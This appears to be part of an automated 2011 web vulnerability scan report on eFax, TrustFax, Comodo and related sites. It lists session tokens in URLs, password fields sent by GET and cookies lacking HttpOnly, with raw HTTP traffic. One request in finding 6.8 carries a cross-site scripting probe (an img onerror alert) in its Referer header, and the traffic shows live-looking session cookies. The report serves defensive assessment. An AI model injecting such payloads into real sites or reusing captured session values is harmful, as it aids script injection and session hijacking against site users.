Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

<script language="javascript" src="https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/">//</script>
...[SNIP]...

4.2. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://efaxcorporate.com
Path:	/solutions/Compatibility/Industry-Compatibility

Issue detail

The response contains the following links that appear to contain session tokens:

https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...

<script language="javascript" src="https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/">//</script>
...[SNIP]...

4.3. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://j2global.tt.omtrdc.net
Path:	/m2/j2global/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard?mboxHost=www.trustfax.com&mboxSession=1316364084200-226831&mboxPage=1316364084200-226831&screenHeight=1200&screenWidth=1920&browserWidth=1097&browserHeight=869&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=TF_xs_adClick_globalfooter&mboxId=0&mboxTime=1316346084298&mboxURL=http%3A%2F%2Fwww.trustfax.com%2F&mboxReferrer=http%3A%2F%2Fwww.vengine.com%2Fproducts%2Fprove_it.html&mboxVersion=39

Request

GET /m2/j2global/mbox/standard?mboxHost=www.trustfax.com&mboxSession=1316364084200-226831&mboxPage=1316364084200-226831&screenHeight=1200&screenWidth=1920&browserWidth=1097&browserHeight=869&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=TF_xs_adClick_globalfooter&mboxId=0&mboxTime=1316346084298&mboxURL=http%3A%2F%2Fwww.trustfax.com%2F&mboxReferrer=http%3A%2F%2Fwww.vengine.com%2Fproducts%2Fprove_it.html&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 181
Date: Sun, 18 Sep 2011 11:40:19 GMT
Server: Test & Target

mboxFactories.get('default').get('TF_xs_adClick_globalfooter',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316364084200-226831.19");

4.4. https://secure.comodo.com/ev/faq.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.comodo.com
Path:	/ev/faq.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=Sales&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a

Request

GET /ev/faq.html HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:31:04 GMT
Content-Type: text/html
Content-Length: 14655
Last-Modified: Wed, 03 Feb 2010 20:10:06 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<li><a id="_lpChatBtn" href='http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=Sales&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a' target='chat61298727' onClick="javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&SESSIONVAR!skill=Sales&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a&referrer='+escape(document.location),'chat61298727','width=475,height=400,resizable=yes');return false;">Chat with an EV SSL Specialist Now</a>
...[SNIP]...

4.5. https://secure.comodo.com/geekbuddy/create-account.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.comodo.com
Path:	/geekbuddy/create-account.php

Issue detail

The response contains the following links that appear to contain session tokens:

http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=CFP%20PRO%20PLUS&imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a

Request

GET /geekbuddy/create-account.php HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:31:06 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 33647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td colspan="2" class="terms_cond">Need help with Billing or with Registration? ... <a rel="nofollow" href="http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=CFP%20PRO%20PLUS&imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a" onclick="javascript:pageTracker._trackPageview('/outbound/order-index/form/text/server.iad.liveperson.net'); javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=CFP%20PRO%20PLUS&imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a','chat','width=475,height=400,resizable=yes');return false;" class="blue_link">Chat Now</a>
...[SNIP]...
<span><a rel="nofollow" href="http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=CFP%20PRO%20PLUS&imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a" onclick="javascript:pageTracker._trackPageview('/outbound/order-index/footer/text/server.iad.liveperson.net'); javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=CFP%20PRO%20PLUS&imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a','chat','width=475,height=400,resizable=yes');return false;" title="Member Chat">Member Chat</a>
...[SNIP]...

4.6. http://server.iad.liveperson.net/hc/61298727/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://server.iad.liveperson.net
Path:	/hc/61298727/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://server.iad.liveperson.net/hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=startPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328667529&&SESSIONVAR!skill=Sales&scriptType=SERVERBASED&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=startPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328667529&&SESSIONVAR!skill=Sales&scriptType=SERVERBASED&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5094376206423575644; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310598891

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_61298727=STANDALONE; path=/hc/61298727
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

4.7. http://www.enterprisessl.com/ssl-certificate-products/evssl/ssl-certificate-search.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.enterprisessl.com
Path:	/ssl-certificate-products/evssl/ssl-certificate-search.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://icrs.informe.org/nei-sos-icrs/ICRS;jsessionid=B2AC095946D5DEAD874571E37C7C8D3B?MainPage=x

Request

GET /ssl-certificate-products/evssl/ssl-certificate-search.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:47 GMT
Content-Type: text/html
Content-Length: 18664
Last-Modified: Wed, 20 Oct 2010 18:25:04 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Business En
...[SNIP]...
<li><a href="http://icrs.informe.org/nei-sos-icrs/ICRS;jsessionid=B2AC095946D5DEAD874571E37C7C8D3B?MainPage=x" onclick="return popitup('http://icrs.informe.org/nei-sos-icrs/ICRS;jsessionid=B2AC095946D5DEAD874571E37C7C8D3B?MainPage=x')">Maine Corporation Search</a>
...[SNIP]...

5. Password field submitted using GET method previous next
There are 2 instances of this issue:

/confidence_pak-buy.html
/logos/index.html

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

5.1. http://www.contentverification.com/confidence_pak-buy.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/confidence_pak-buy.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://secure.comodo.com/products/!placeOrder

The form contains the following password field:

loginPassword

Request

GET /confidence_pak-buy.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/confidence_pak.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:00:00 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 7751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Conte
...[SNIP]...
</ul>
<form name="formN" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="currency" />
...[SNIP]...
</strong>
<input type="password" name="loginPassword" value="" /></p>
...[SNIP]...

5.2. http://www.contentverification.com/logos/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/logos/index.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://secure.comodo.com/products/!placeOrder

The form contains the following password field:

loginPassword

Request

GET /logos/index.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 26684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</h1>
<form name="logo" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="ap" value="contentverification.com" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

6. Cookie without HttpOnly flag set previous next
There are 15 instances of this issue:

http://efaxcorporate.com/
http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility
http://efaxdeveloper.com/
http://www.govinfosecurity.com/articles.php
https://www.panopticsecurity.com/Comodo/index.jsp
https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion
https://www.panopticsecurity.com/PCICS/PanController/doInitUser
http://www.trustfax.com/a
http://apis.google.com/js/plusone.js
http://log.optimizely.com/event
http://server.iad.liveperson.net/hc/61298727/
http://server.iad.liveperson.net/hc/61298727/
http://server.iad.liveperson.net/hc/61298727/x.js
http://www.bizographics.com/collect/
http://www.seeos.com/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://efaxcorporate.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://efaxcorporate.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
brand=efaxcorp; Domain=.efaxcorporate.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.2. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://efaxcorporate.com
Path:	/solutions/Compatibility/Industry-Compatibility

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
brand=efaxcorp; Domain=.efaxcorporate.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.3. http://efaxdeveloper.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://efaxdeveloper.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMS_JSESSIONID=V5c6T1hMnXsnxsT6n2c2DJTWHR5SLJG8fngF7dvLv0h2TyrWDBlv!-1356397028; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxdeveloper.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:24 GMT
Server: Apache
Vary: Host,Accept-Encoding
Cache-Control: max-age=43200, public
Pragma:
Content-Length: 16094
Expires: Mon, 19 Sep 2011 00:19:24 GMT
Last-Modified: Sun, 18 Sep 2011 10:26:52 GMT
X-Magnolia-Registration: Registered
Set-Cookie: CMS_JSESSIONID=V5c6T1hMnXsnxsT6n2c2DJTWHR5SLJG8fngF7dvLv0h2TyrWDBlv!-1356397028; path=/
Set-Cookie: lang=en; domain=efaxdeveloper.com; expires=Wednesday, 02-Nov-2011 12:19:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
X-TWA-Web: pb:28032
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<div s
...[SNIP]...

6.4. http://www.govinfosecurity.com/articles.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.govinfosecurity.com
Path:	/articles.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=fvfq7uh4sorob9bergs9g45t37

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /articles.php HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Set-Cookie: isPopUpDone=1; expires=Sun, 18-Sep-2011 11:11:23 GMT; domain=.govinfosecurity.com
Connection: close
Content-Type: text/html
Content-Length: 121213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

6.5. https://www.panopticsecurity.com/Comodo/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.panopticsecurity.com
Path:	/Comodo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=c437c7a28b71ec890cf440a1d883; Path=/PCICS

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.6. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doMetaQuestion

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=c4b411f07d6c067b98ce9194a5ae; Path=/PCICS

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.7. https://www.panopticsecurity.com/PCICS/PanController/doInitUser previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doInitUser

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=c48a63af3a1fe42b1ac75b96be64; Path=/PCICS

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.8. http://www.trustfax.com/a previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trustfax.com
Path:	/a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=798DFD1D548B6B5C106F73F5DF24E3F0.trustfax2a; Path=/trustfax-cms-public
AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; Version=1; Domain=www.trustfax.com; Max-Age=31536000; Expires=Mon, 17-Sep-2012 11:52:19 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a HTTP/1.1
Host: www.trustfax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/pricing.htmlaf10d--%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E0bedec460c4

Response

HTTP/1.1 404 Not Found
Date: Sun, 18 Sep 2011 11:52:19 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=798DFD1D548B6B5C106F73F5DF24E3F0.trustfax2a; Path=/trustfax-cms-public
Set-Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; Version=1; Domain=www.trustfax.com; Max-Age=31536000; Expires=Mon, 17-Sep-2012 11:52:19 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 11:52:19 GMT
X-TWA-Web: pb:28192
Content-Length: 0
Content-Type: text/html;charset=UTF-8

6.9. http://apis.google.com/js/plusone.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apis.google.com
Path:	/js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRj5Y_McDPpUTRM70c1_kfRaM0t1NIGOeKymCZf_GkU6cxXYEHblQwAvGR_WSjcMuxkvK3WyncNjjtSf5BO7OMdVM8V2NjhVDXfhMJ6l8gPKEvJNy95-i_R-RDOyY0ADU6-pKSHuPOnJlY5NCKau5HhqlG4rtz9dlPp2-RUQ0e00xAg-03wDCA5Aya4w2pvz_sx9PKUz4Z_p_7XpMhOQPpQoHjbly5_fRWrgbicqscZk4n9CAAkmJfJLiLOih9pzf-hVx55GXF4ceDiaulA2MQUbxeqBsxvSi3H3-auSOBF0i8;Domain=.google.com;Path=/;Expires=Wed, 15-Sep-2021 12:19:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
